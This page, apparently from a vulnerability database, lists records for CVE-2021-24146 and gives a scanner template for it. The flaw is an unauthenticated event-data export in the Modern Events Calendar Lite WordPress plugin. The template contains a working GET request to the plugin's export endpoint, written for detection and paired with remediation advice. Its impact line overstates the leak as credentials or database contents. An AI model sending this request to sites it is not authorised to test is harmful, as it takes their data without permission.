| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| Wordpress Modern Events Calendar 5.16.2 Plugin - Event export (Unauthenticated) Exploit | 2 Jul 202100:00 | โ | zdt | |
| CVE-2021-24146 | 18 Mar 202117:32 | โ | circl | |
| Wordpress Modern Events Calendar Lite ่ฎฟ้ฎๆงๅถ้่ฏฏๆผๆด | 18 Mar 202100:00 | โ | cnnvd | |
| CVE-2021-24146 | 18 Mar 202114:57 | โ | cve | |
| CVE-2021-24146 Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export | 18 Mar 202114:57 | โ | cvelist | |
| Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) | 2 Jul 202100:00 | โ | exploitdb | |
| CVE-2021-24146 | 18 Mar 202115:15 | โ | nvd | |
| WordPress Modern Events Calendar 5.16.2 Information Disclosure | 2 Jul 202100:00 | โ | packetstorm | |
| Format string | 18 Mar 202115:15 | โ | prion | |
| PT-2021-15692 ยท WordPress ยท Modern Events Calendar Lite | 18 Mar 202100:00 | โ | ptsecurity |
id: CVE-2021-24146
info:
name: WordPress Modern Events Calendar Lite <5.16.5 - Sensitive Information Disclosure
author: random_robbie
severity: high
description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.
impact: |
An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents.
remediation: |
Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability.
reference:
- https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
- http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-24146
- https://github.com/Hacker5preme/Exploits
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
cvss-score: 7.5
cve-id: CVE-2021-24146
cwe-id: CWE-862,CWE-284
epss-score: 0.31043
epss-percentile: 0.98043
cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: webnus
product: modern_events_calendar_lite
framework: wordpress
tags: cve,cve2021,wpscan,packetstorm,wordpress,wp-plugin,webnus,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "mec-events"
- "text/csv"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022100f0e08e263352b0ce06d1434ce1a000098283ef0ebeb24fadd2a966d049d50ea802200df9854919bf74259b756c5fb0a03b9f5e952ced9f85c1e037a4208b792109ba:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation